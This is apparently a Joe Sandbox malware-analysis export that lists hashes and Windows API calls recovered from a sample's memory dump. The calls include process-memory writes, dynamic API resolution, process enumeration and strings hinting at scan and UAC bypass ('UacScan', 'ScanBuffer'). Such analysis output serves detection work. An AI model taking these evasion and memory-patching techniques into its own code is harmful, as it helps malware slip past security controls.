• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: InitVariant
• String ID:
• API String ID: 1927566239-0
• Opcode ID: 84480e1d94c321ea51f9f28bca4e3bcf72647aadfbb41a884977e95de5da6bae
• Instruction ID: a8f6f91a1a55daaf5502f92e1a51189f0371e87b92569bbfee8251ef833a6103
• Opcode Fuzzy Hash: 84480e1d94c321ea51f9f28bca4e3bcf72647aadfbb41a884977e95de5da6bae
• Instruction Fuzzy Hash: 7A3152726001089FDBD1DFE9D884AAE7BE9EB4C304F444469FB05D3260D734DA54CBA5
APIs
  • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
  • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
  • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
  • Part of subcall function 02D07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D07DEC
  • Part of subcall function 02D08338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D083C2), ref: 02D083A4
• FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
• String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1478290883-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4fa571d70b1a19e19b5e1122e9f37133a7c9fe23fc29e3022ea440822298069c
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 60cab84dd6ee1f63a52f3ad93f34ddb5214497f3e0e635809cdf3fd2edbd2962
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fa571d70b1a19e19b5e1122e9f37133a7c9fe23fc29e3022ea440822298069c
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A210370B80304ABF794F7B5DC41B9EB7A9DB04700F500860BB55E73D0D674AD44AA39
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32(00000000,?,00000000,02D06DB9,?,?,?,00000000), ref: 02D06D99
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF4C60: SysFreeString.OLEAUT32(02D0F4A4), ref: 02CF4C6E
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FreeFromProgString
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4225568880-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 402bdff5bc8f217b687e6e939cda6b38e0fb534f94e5506794c29d1b02b8e2d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d5114ed5cdcf6e672b02a8624645c911c9e07182cad55bd69179a928dff922a8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 402bdff5bc8f217b687e6e939cda6b38e0fb534f94e5506794c29d1b02b8e2d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78E0E536200708BBE365EB62EC91E8E77ADDB8A710B5104B1E70093650D971AE1498B0
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(02CF0000,?,00000105), ref: 02CF5886
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02CF0000,02D1E790), ref: 02CF5AE8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CF0000,02D1E790), ref: 02CF5B06
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CF0000,02D1E790), ref: 02CF5B24
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02CF5B42
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02CF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02CF5B8B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: RegQueryValueExA.ADVAPI32(?,02CF5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02CF5BD1,?,80000001), ref: 02CF5BA9
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF5ACC: RegCloseKey.ADVAPI32(?,02CF5BD8,00000000,?,?,00000000,02CF5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CF5BCB
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2796650324-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7f8f77932fcdbc5c90210335602098ae450e9ef3aa60b77dbdc0cb607d9f4a58
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDE09271A403149FCB94DE9CC8C0B5633D8AF48790F444961EE58CF346D7B0DA208BD0
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02CF7DF4
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7ebe6ff94a676046cd6a426ad1a4fdac13e8367b42668e02e0e412efa8c72591
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5D05BB23091507AE264965B5D44EA75BDCCBC6770F10063EF668C7180D7208C05C771
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,02D1356F,ScanString,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,Initialize), ref: 02CF7E8B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7398be88259ab56bd94e9b78fb33d2792a965cb7e00bee938a382832776afd26
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7C08CF23116010E1EE4A6BC1CC421A429D09C4134B601E23EB38CA2C1E326992A3820
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,02D1041F,ScanString,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,UacInitialize), ref: 02CF7E67
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b07eea414aa6baa5c584909d3b86b552c4b0ad49416bd742cd4c4d4f9540ee31
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68C08CA03012010E5AE866BC2CC424A528E09842387640A23AB38C62E2E33A99AB3810
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FreeString
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5a0fda811deda4449a26914b882cba46a0195c805436b99864ba35f0d410593f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EC012A260063057EBF55699ACC075362DC9B45294B1900A19705D7251E364D90056A0
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • timeSetEvent.WINMM(00002710,00000000,02D1C350,00000000,00000001), ref: 02D1C36C
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Eventtime
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2982266575-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3adfcfa9150808cbab61505282972247a4b496945bce3af7131c98fc36dc7026
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ca704b4043a04d2af995805ae9afc270abb81f11c5782ed80aaa5715a4b773db
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3adfcfa9150808cbab61505282972247a4b496945bce3af7131c98fc36dc7026
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01C048B27E03003AFA50A6AA6C82F27569D9705B50F500416F704EA2C2D2A269605E68
APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 02CF4C3F
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
• Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
• Instruction ID: 79605fd24afb79261f484944138f91629c85160d246f4b866e7be584bee5fd18
• Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
• Instruction Fuzzy Hash: 58B0123520860155FAFC27A30F00733004D1BC0286F892052DF18C80E0FB41C101D836
APIs
• SysFreeString.OLEAUT32(00000000), ref: 02CF4C57
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
• Instruction ID: 5bfb5a6a1e366ebb2b2eebf54506e86852a37438f5748f99b8b91dfe542061cb
• Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
• Instruction Fuzzy Hash: 55A011A8000A028A8AEA23A8002002B2A322EC0200388C0A883000A0028A2A8000A820
APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02CF1A03,?,02CF1FC1), ref: 02CF15E2
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 1e059180b5e1949c67567a15b0d34a0ac79ceb576875e084ed292af76cad4348
• Instruction ID: 1137a735d8dd0409d772eecf216b59b0e9b0bdfaeee6d7350792c4655ce95e27
• Opcode Fuzzy Hash: 1e059180b5e1949c67567a15b0d34a0ac79ceb576875e084ed292af76cad4348
• Instruction Fuzzy Hash: DCF049F0B413008FDB8ACFB999403017BF2E78A345F648579D609DB398F7B988058B80
APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02CF1FC1), ref: 02CF16A4
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: cd27bb8eae025994ff5879e9edb3da3eabbf841515801d953bd62d2534f147e2
• Instruction ID: ee7e25b1af0166822e3b7418dae8b6fb172c723f46382741f1e8c44974a143a5
• Opcode Fuzzy Hash: cd27bb8eae025994ff5879e9edb3da3eabbf841515801d953bd62d2534f147e2
• Instruction Fuzzy Hash: 84F0BEB2B40B95ABD7509F5E9C80B82BB98FB50365F090139FA0C9B740E7B4EC148BD4
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02CF1FE4), ref: 02CF1704
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1a737b6a96702931abf6b80eeb85abd87ed5d1451c13553ea40258b7130bc81b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5cedcec98a7425aa6516c4731c93cd668771cac835f222c4fbc4226c5c0d2860
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a737b6a96702931abf6b80eeb85abd87ed5d1451c13553ea40258b7130bc81b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3E08675300301EFD7905A7E5D407126BDCEB54664F194476F709DB241D2E0E8148B60
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02D0ADA3,?,?,02D0AE35,00000000,02D0AF11), ref: 02D0AB30
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02D0AB48
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02D0AB5A
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02D0AB6C
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02D0AB7E
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02D0AB90
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02D0ABA2
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02D0ABB4
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02D0ABC6
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02D0ABD8
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02D0ABEA
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02D0ABFC
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02D0AC0E
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02D0AC20
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02D0AC32
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02D0AC44
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02D0AC56
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
